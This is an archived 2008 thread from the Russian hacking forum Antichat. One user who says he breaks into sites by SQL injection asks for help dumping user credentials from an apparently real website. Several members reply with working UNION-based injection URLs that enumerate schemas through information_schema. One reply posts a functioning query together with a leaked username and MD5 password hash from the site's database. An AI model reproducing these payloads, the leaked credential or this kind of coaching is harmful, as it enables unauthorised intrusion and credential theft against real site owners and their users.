ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #4111  
Старый 11.12.2008, 16:20
rip86
Новичок
Регистрация: 24.09.2008
Сообщений: 12
Провел на форуме:
65637

Репутация: 0
По умолчанию

2 159932, спасибо
 

  #4112  
Старый 13.12.2008, 02:31
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

Подскажите, я несколько раз, ломая сайт через SQL-инъекцию, наталкивался на админку, авторизация в которой выглядит как системное сообщение (поверх окна, наверняка многие с этим сталкивались..) с полями Имя пользователя и Пароль. Почему то ни в одном случае не получалочь войти в админку, несмотря на то, что логин и пароль введены верно: после ввода появляется ошибка Authorization Required. Во всех остальных случаях авторизация проходит нормально, такая проблема только с подобным видом авторизации. Почему такое может происходить? Вход в админку возможен только с определенного IP? Или что то другое..?
 

  #4113  
Старый 13.12.2008, 02:47
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

эти пароли хоаняться в файле htpasswd ....
 

  #4114  
Старый 13.12.2008, 03:05
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

То есть при уязвимости в SQL с такой авторизацией получается я никак пассы не достану..? :/ Странно, а зачем же тогда поле Passwd в таблице пользователей сайта..

и еще вопрос: нашел скулю вида:
Код:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--%20%201
Хочу соответственно узнать логин и пасс юзеров, ввожу:
Код:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+c_users--%20%201
И мне видается ошибка Table 'siteru.c_users' doesn't exist
То есть такой таблицы не существует? Но я же точно знаю, что она есть... и все названия таблиц и колонок правельные!

Последний раз редактировалось Thrasher88; 13.12.2008 в 03:09..
 

  #4115  
Старый 13.12.2008, 03:06
preda1or
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545

Репутация: 242
Отправить сообщение для preda1or с помощью ICQ
По умолчанию

Цитата:
эти пароли хоаняться в файле htpasswd ....
не факт, по крайней мере с Apache.
вот почитайте
Цитата:
http://www.softtime.ru/article/index.php?id_article=27

Последний раз редактировалось preda1or; 13.12.2008 в 03:08..
 

  #4116  
Старый 13.12.2008, 04:16
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Thrasher88, проблема в ДБ, в которой находится нужная таблица. Узнавай шема наим!
 

  #4117  
Старый 13.12.2008, 11:37
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

Цитата:
Узнавай шема наим
правильно ли я делаю? Ввел:
Цитата:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,table_schema,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+from+information_sc hema.tables--%20%201
Появилось, я так понимаю, это самое schema name, попробовал с этим названием:
Цитата:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u sername,password),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8+from+worldsru.c_reg_users--%20%201
Все равно пишет, что Table 'worldsru.c_reg_users' doesn't exist Попробовал поперебирать через LIMIT - всего 2 имени - собственно само information_schema и это worldsru ((
 

  #4118  
Старый 13.12.2008, 13:16
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Ты не указал, у какой таблицы хочешь узнать table_schema, чтобы узнать нужную, выполни запрос
Код:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,table_schema,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.tables+where+table_name='c_reg_users'--%20%201
 

  #4119  
Старый 13.12.2008, 14:06
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Thrasher88
Вот рабочий запрос:

http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u sername,password),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8+from+aphorism.c_reg_users/*
база: aphorism
nazar:4afd521d77158e02aed37e2274b90c9c

А вот все базы их там 10 шт:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,schema_name,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38+from+information_sch ema.schemata+limit+9,1/*
 

  #4120  
Старый 13.12.2008, 14:28
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

как можно узнать полный путь к корню сайта?
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ